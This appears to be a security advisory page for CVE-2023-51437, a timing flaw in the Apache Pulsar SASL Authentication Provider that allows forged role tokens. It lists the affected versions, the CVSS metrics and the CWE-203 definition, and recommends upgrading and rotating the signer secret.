Observable Discrepancy

CVE-2023-51437

High

7.4/10

Summary

Observable timing discrepancy vulnerability in Apache Pulsar SASL Authentication Provider can allow an attacker to forge a SASL Role Token that will pass signature verification. This issue affects org.apache.pulsar:pulsar-broker-auth-sasl versions prior to 2.11.3, 3.0.x prior to 3.0.2, and 3.1.0. Users are recommended to upgrade to the fixed version. Users should also consider updating the configured secret in the "saslJaasServerRoleTokenSignerSecretPath" file. Any component matching the above version running the SASL Authentication Provider is affected. That includes the Pulsar Broker, Proxy, Websocket Proxy, or Function Worker.

Attack Complexity: HIGH
Attack Vector: NETWORK
Integrity Impact: HIGH
Scope: UNCHANGED
User Interaction: NONE
Privileges Required: NONE
Confidentiality Impact: HIGH
Availability Impact: NONE

CWE-203 - Observable Discrepancy

The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not.

References

Advisory Timeline

Published Feb 07, 2024

Observable Discrepancy

CVE-2023-51437

Summary

CWE-203 - Observable Discrepancy

References

Advisory Timeline

ChainJacking

JetBrains IDE

KICS SaaS